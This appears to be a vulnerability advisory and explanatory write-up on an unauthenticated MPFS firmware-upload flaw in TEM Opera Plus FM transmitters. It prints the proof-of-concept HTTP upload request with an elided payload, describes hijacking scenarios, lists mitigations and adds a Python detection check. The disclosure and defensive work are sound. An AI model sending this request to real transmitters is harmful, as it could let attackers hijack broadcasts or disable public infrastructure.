TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
Webserver version: 1.7
Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.
Desc: The device allows access to an unprotected endpoint that allows
MPFS File System binary image upload without authentication. The MPFS2
file system module provides a light-weight read-only file system that
can be stored in external EEPROM, external serial Flash, or internal
Flash program memory. This file system serves as the basis for the
HTTP2 web server module, but is also used by the SNMP module and is
available to other applications that require basic read-only storage
capabilities. This can be exploited to overwrite the flash program
memory that holds the web server's main interfaces and execute arbitrary
code.
Tested on: Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5799
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php
18.08.2023
--
POST /mpfsupload HTTP/1.1
Host: 192.168.1.2:8000
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy2
User-Agent: MPFS2_PoC/2.0c
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------joxypoxy2
Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"
Content-Type: application/octet-stream
MPFS...<CGI BINARY PHONE HOME>
-----joxypoxy2--
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>
Remote Code Execution Vulnerability in TEM Opera Plus FM Family Transmitter 35.45
The TEM Opera Plus FM Family Transmitter 35.45, a high-efficiency broadcast transmitter developed by Telecomunicazioni Elettro Milano (TEM) S.r.l., has recently been found to harbor a critical security flaw that enables remote code execution (RCE). This vulnerability arises from an unprotected endpoint allowing unauthorized binary file uploads to the device’s flash memory via the MPFS2 file system module, effectively compromising the core firmware and enabling attackers to execute arbitrary code.
Technical Overview: The MPFS2 File System and Its Role
The MPFS2 (Memory-Programmable File System 2) is a lightweight, read-only file system designed for embedded systems. It supports storage in external EEPROM, serial Flash, or internal Flash program memory. In the TEM Opera Plus FM Transmitter, MPFS2 serves as the foundation for the HTTP2 web server, SNMP module, and other firmware components requiring persistent, read-only data storage.
While intended for secure firmware management, the implementation in version 35.45 exposes a critical flaw: the /mpfsupload endpoint accepts file uploads without authentication. This allows an attacker to upload a specially crafted binary image, MPFSimg2.bin, which can overwrite the flash memory containing the web server’s main interfaces and core logic.
POST /mpfsupload HTTP/1.1
Host: 192.168.1.2:8000
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy2
User-Agent: MPFS2_PoC/2.0c
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------joxypoxy2
Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"
Content-Type: application/octet-stream
MPFS...
-----joxypoxy2--
Explanation: This HTTP POST request sends a multipart form data payload to the /mpfsupload endpoint. The file named MPFSimg2.bin is uploaded with a Content-Type of application/octet-stream, indicating binary data. The response 200 OK with the message MPFS Update Successful confirms that the upload was accepted and processed.
Crucially, the binary payload is not validated or authenticated. The lack of access control means any attacker with network access to the device can upload malicious firmware, replacing the legitimate web server code with a backdoor or malicious executable.
Exploitation and Impact
Once the malicious binary is uploaded and flashed into the device’s program memory, the attacker gains full control over the device’s web interface, SNMP services, and potentially the broadcast signal itself. This can lead to:
- Unauthorized broadcast manipulation – altering audio content or RDS data.
- Remote shell access – execution of arbitrary commands via CGI scripts.
- Denial of service – corrupting firmware and rendering the transmitter inoperable.
- Privilege escalation – bypassing security controls and gaining administrative access.
Given that the transmitter is often deployed in public broadcasting infrastructure, such vulnerabilities pose a significant risk to media integrity, public safety, and regulatory compliance.
Vendor and Affected Versions
| Vendor | Telecomunicazioni Elettro Milano (TEM) S.r.l. |
|---|---|
| Product | Opera Plus FM Family Transmitter |
| Software Version | 35.45 |
| Webserver Version | 1.7 |
| Advisory ID | ZSL-2023-5799 |
| Discovery | Gjoko "LiquidWorm" Krstic @zeroscience |
| Publication Date | 18.08.2023 |
While the product is marketed as "high reliability" and "low energy consumption," the absence of authentication on the /mpfsupload endpoint undermines these claims in practice.
Real-World Use Case: Broadcast Hijacking
Imagine a scenario where an attacker uploads a malicious binary that includes a CGI script to redirect all incoming HTTP requests to a malicious server. The transmitter could then be used to broadcast misinformation, such as fake emergency alerts or unauthorized advertisements, without the operator’s knowledge.
Additionally, the transmitter’s built-in GSM telemetry and TCP/IP connectivity make it a prime target for remote exploitation. An attacker could exploit this vulnerability to gain persistent access to the device, even after rebooting, due to the persistent nature of flash memory.
Security Recommendations and Mitigations
For operators and administrators using TEM Opera Plus FM Transmitters, immediate action is required:
- Disable or restrict access to the /mpfsupload endpoint – via firewall rules or access control lists.
- Update firmware – if an official patch is released by TEM, apply it immediately.
- Implement network segmentation – isolate transmitters from public networks.
- Monitor for anomalous HTTP POST requests – use intrusion detection systems (IDS) to detect suspicious uploads.
- Use secure boot mechanisms – if available, ensure firmware integrity verification during boot.
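One way to implement the monitoring item above, as an added example that is not part of the advisory or of any TEM tooling: a check that a proxy or IDS sensor could run over each reassembled HTTP request headed for a transmitter. The function name, the management-host allowlist and the sample addresses are assumptions; the endpoint path and the `MPFS` image prefix come from the request shown in the advisory.

```python
import re

UPLOAD_PATH = "/mpfsupload"   # endpoint named in the advisory
MPFS_MAGIC = b"MPFS"          # image prefix visible in the advisory's request body

def inspect_request(raw: bytes, src_ip: str, mgmt_hosts: frozenset) -> list:
    """Return findings for one reassembled HTTP request (empty list = no alert)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    try:
        method, target, _version = lines[0].split(" ", 2)
    except ValueError:
        return []                                   # not a parseable request line
    # Normalise conservatively: ignore query string, trailing slash and case.
    path = target.split("?", 1)[0].rstrip("/").lower()
    if method.upper() != "POST" or path != UPLOAD_PATH:
        return []
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (ln.partition(":") for ln in lines[1:])}
    findings = [f"POST {UPLOAD_PATH} from {src_ip}"]
    if src_ip not in mgmt_hosts:                    # hypothetical allowlist
        findings.append("source is not an approved management host")
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if m:
        # Each multipart part is "<part headers>\r\n\r\n<payload>".
        for part in body.split(b"--" + m.group(1).encode("latin-1")):
            _, sep, payload = part.partition(b"\r\n\r\n")
            if sep and payload.startswith(MPFS_MAGIC):
                findings.append("multipart part begins with MPFS image magic")
    return findings

# Constructed sample modelled on the advisory's request; the payload is dummy bytes.
SAMPLE = (b"POST /mpfsupload HTTP/1.1\r\nHost: 192.168.1.2:8000\r\n"
          b"Content-Type: multipart/form-data; boundary=----joxypoxy2\r\n\r\n"
          b"------joxypoxy2\r\n"
          b'Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"\r\n'
          b"Content-Type: application/octet-stream\r\n\r\n"
          b"MPFS" + b"\x00" * 8 + b"\r\n------joxypoxy2--\r\n")

if __name__ == "__main__":
    for finding in inspect_request(SAMPLE, "203.0.113.7", frozenset({"192.168.1.10"})):
        print(finding)
```

Because the endpoint requires no authentication, any hit from outside the allowlist deserves an alert on its own; the magic-byte match only raises confidence that an image was actually pushed.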
For developers, this case highlights the importance of secure file system design: even read-only file systems must be protected against unauthorized write operations. The principle of least privilege should be applied rigorously, especially in devices with remote connectivity.
Conclusion: A Wake-Up Call for Embedded Security
The TEM Opera Plus FM Transmitter 35.45 vulnerability exemplifies a growing trend in embedded systems: security by obscurity fails. Devices that appear "secure" due to proprietary hardware or limited access often lack fundamental security controls like authentication and input validation.
As cyber threats increasingly target infrastructure, such as broadcast transmitters, the need for robust, auditable security practices in embedded firmware cannot be overstated. This vulnerability serves as a stark reminder: no device is secure if it allows unauthenticated binary uploads to its core memory.